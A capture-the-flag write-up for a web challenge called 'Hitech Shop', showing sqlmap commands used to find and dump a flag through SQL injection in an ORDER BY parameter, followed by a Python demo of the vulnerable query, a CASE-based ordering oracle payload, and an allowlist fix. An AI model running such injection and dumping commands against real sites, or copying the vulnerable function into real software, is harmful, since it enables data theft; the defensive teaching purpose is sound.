- Category: Web
- Name: Hitech Shop
- Level: None
- Description: None
- Overview: the challenge provided us a search box; I think it is SQL injection.
- I tried a double quote, and this is the server response.
- Run this command in sqlmap:

  ```
  sqlmap -u http://125.235.240.166:20105/index?order=price --time-sec=200 --user-agent=* --dbs --level 5
  ```

- I found two databases, but I only paid attention to `vannd`.
- Then I used this command to scan the `vannd` tables:

  ```
  sqlmap -u http://125.235.240.166:20105/index?order=price --tables -D vannd
  ```

- Finally I found a table containing the flag =))))
- Later I scanned the `flag` table using this command:

  ```
  sqlmap -u http://125.235.240.166:20105/index?order=price --columns -D vannd -T flag --dump
  ```

- FLAG: `ASCIS{SQL_1nJecTi0n_Ba5e_0N_OrdeR_bY}`
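The flag name says the bug is an injection in the `order=` parameter, i.e. an `ORDER BY` built from user input. The following Python example is added here and is not part of the original writeup or the challenge's code; it uses a constructed in-memory SQLite schema (`products` and `flag` tables, a placeholder flag value) and shows the vulnerable pattern beside an allowlist-based fix. `ORDER BY` column names cannot be passed as bound parameters, which is why this bug is common: the fix is to map the untrusted value onto a fixed set of known columns rather than to escape it.

```python
import re
import sqlite3

# Constructed stand-in for the shop's database (assumption: the real schema is not on the page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price INTEGER);
        INSERT INTO products (name, price) VALUES ('router', 120), ('switch', 80), ('firewall', 300);
        CREATE TABLE flag (id INTEGER PRIMARY KEY, value TEXT);
        INSERT INTO flag (value) VALUES ('FLAG{placeholder}');
    """)
    return conn


def list_products_vulnerable(conn, order):
    # Vulnerable: the order parameter is pasted straight into the SQL text, so any
    # expression (including one that reads other tables) becomes the sort key.
    sql = f"SELECT name, price FROM products ORDER BY {order}"
    return conn.execute(sql).fetchall()


# Allowlist: the only sort keys the application actually supports.
ALLOWED_ORDER = {"price": "price", "name": "name", "id": "id"}


class BadSortColumn(ValueError):
    pass


def list_products_hardened(conn, order):
    # Hardened: accept only "<column>" or "<column> asc|desc" where <column> is in the
    # allowlist; the SQL text is assembled from the allowlisted names, never from input.
    m = re.fullmatch(r"(\w+)(?:\s+(asc|desc))?", order.strip(), re.IGNORECASE)
    if not m or m.group(1).lower() not in ALLOWED_ORDER:
        raise BadSortColumn(order)
    column = ALLOWED_ORDER[m.group(1).lower()]
    direction = (m.group(2) or "asc").upper()
    sql = f"SELECT name, price FROM products ORDER BY {column} {direction}"
    return conn.execute(sql).fetchall()


def demo():
    # Shows why the vulnerable form leaks: the row order depends on a condition
    # evaluated against a different table, which is what an ORDER BY oracle exploits.
    conn = make_db()
    true_cond = "(CASE WHEN (SELECT length(value) FROM flag) > 5 THEN price ELSE -price END)"
    false_cond = "(CASE WHEN (SELECT length(value) FROM flag) < 5 THEN price ELSE -price END)"
    result = {
        "normal": list_products_vulnerable(conn, "price"),
        "true_cond_first": list_products_vulnerable(conn, true_cond)[0],
        "false_cond_first": list_products_vulnerable(conn, false_cond)[0],
        "hardened_desc_first": list_products_hardened(conn, "price desc")[0],
    }
    try:
        list_products_hardened(conn, true_cond)
        result["hardened_rejects"] = False
    except BadSortColumn:
        result["hardened_rejects"] = True
    return result


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Detection-wise, the hardened version turns every non-allowlisted `order` value into an exception, so logging `BadSortColumn` gives a clean signal for scanner traffic like the sqmap runs above (`--level 5` sends many such payloads).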